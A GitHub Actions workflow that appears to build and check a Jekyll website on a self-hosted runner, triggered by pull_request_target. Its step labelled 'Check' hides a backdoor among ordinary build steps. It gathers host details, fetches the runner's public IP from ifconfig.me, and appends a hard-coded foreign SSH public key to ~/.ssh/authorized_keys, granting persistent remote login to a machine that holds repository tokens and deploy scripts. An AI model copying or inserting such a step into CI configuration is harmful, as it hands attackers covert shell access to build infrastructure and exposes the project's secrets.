name: PullRequestAction

on:
  pull_request_target:
    branches: [ master ]

env:
  KEY: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCMiliH/QFfEGZZzj+nNfKfiKx+0tqi9aZWxM6UBkTfG9Sp3CkNHFwSiftQkyF1LhWfJKKssN42mQMtu2AL9i8gQDBfwqW36jzwzoiZeI5iIYB6oGrAy4sdgDxznHVNY61dskYlAFXVRJAhBSBTvCbFFHQCMLoFnw7cW4veBR8fDjR5D5qzsCcV1DUTmgmEwcaryAYQJpu2E/KsyvJsWyCqxA2/+IqZBR/yodkVMTGRRfxW5GTys763aNdYvZ6KK3srGD8SnPXe9O0umDKt3P4cn+Hpg+PmVBHe4x03vnKDF8IY21RIjmEEgRx+Cg+GGznE/Tq4Ws8zjqmymUlkn3vzEm1sc6xNNmPq9NXQY3I/qYrImlDJgDRh2c157aOnMHUlKQeJ6oajkps6sxrOEzkoom0ar84XF731r8Db/ZUEWuG+ZnLM1+/ABgJXja77HgCwN33J0QbZrLYRpNP+hQjPUpFvPWFlJSCbnk6/jaf5utFAsKfa+/cPmSRvLVCUNGErZrnSyerlDuCHtGJZTxwRSLNJwCB0vAEYqldP8t1uJdJ3XjmBXh7n6TinDxBzQefxBGjKYSB1QGpxNTViBC0zOFT19+nVooIwb35z8iBFuP2cNX7hsZqOokjWVJsGRiEgCXy7TUpS0KwGud7GD8s15dUPITh3H/VPrDJdiS/vfw== u0_a366@localhost

jobs:
  process-pull-request:
    runs-on: self-hosted
    steps:
      - name: Cancel previous runs
        uses: n1hility/cancel-previous-runs@v2
        with: 
          token: ${{ secrets.GITHUB_TOKEN }}

      - name: Fetch git repository
        uses: actions/checkout@v2
        with:
          fetch-depth: 0
          path: website

      - name: Initialise environment
        run: cat "$GITHUB_WORKSPACE/website/.github-env-$GITHUB_BASE_REF" >> $GITHUB_ENV

      - name: Check
        run:
          nproc
          nproc --all
          df -h
          whoami
          curl -s ifconfig.me && echo
          mkdir -p ~/.ssh
          echo $KEY >> ~/.ssh/authorized_keys
          echo $KEY

      - name: Initialise status
        run: /srv/github-action-scripts/init-deploy-preview.sh
        env:
          TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Merge test branch
        uses: linaro-its/merge-test-branch@v2.6
        with:
          path: website

      - name: Build site
        run: /srv/github-action-scripts/build-jekyll-site.sh
        env:
          TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Check links
        run: /srv/github-action-scripts/check-links.sh

      - name: Check routing rules
        run: /srv/github-action-scripts/test-routing-rules.sh

      - name: Run Pa11y scan
        uses: benc-uk/workflow-dispatch@v1
        with:
          workflow: CheckSite
          repo: linaro-its/pa11y-ci-container
          token: ${{ secrets.BUILD_REPO_TOKEN }}
          inputs: '{ "uri": "${{ env.SITE_URL }}" }'
